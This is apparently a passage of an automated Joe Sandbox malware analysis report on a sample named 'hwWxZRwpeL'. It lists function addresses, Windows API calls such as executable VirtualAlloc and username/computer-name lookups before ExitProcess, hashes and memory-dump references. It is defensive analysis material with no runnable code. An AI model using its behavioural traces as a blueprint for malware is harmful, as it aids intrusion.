                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3457870978-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aad4b34c5311c7c1f4c0ec8429ad8fbc51b941422467674b88ee60616fe63994
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aad4b34c5311c7c1f4c0ec8429ad8fbc51b941422467674b88ee60616fe63994
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 0040AEC0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B13A
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B14E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 255189db681c13e167d7383a3dd65fa09e5d8bf4864f5c93b0bb646fede7854e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 255189db681c13e167d7383a3dd65fa09e5d8bf4864f5c93b0bb646fede7854e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 0040B200 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B3FE
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B412
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1aea13d9d321fe14495fe9f10046d12b15116e8c6c974a723adbdbc1e2c6202f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aea13d9d321fe14495fe9f10046d12b15116e8c6c974a723adbdbc1e2c6202f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA
                                                                                                                                                                                                                                                                                                                                  Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84
                                                                                                                                                                                                                                                                                                                                  Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                                                                                                                                                                                                                                                                                                                  Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: abbcf5dc58acacc837df9ec9e29f10c257b6ff310e575f6877f211350d1d644a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abbcf5dc58acacc837df9ec9e29f10c257b6ff310e575f6877f211350d1d644a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89
                                                                                                                                                                                                                                                                                                                                  Function 00418F70 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a69255905556e39711e66d8c03565336fa8894d7185801a9db9e0f27ea33c7b0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69255905556e39711e66d8c03565336fa8894d7185801a9db9e0f27ea33c7b0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95
                                                                                                                                                                                                                                                                                                                                  Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1004333139-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                                                                                                                                                                                                                                                                                                                  Function 00418FC0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
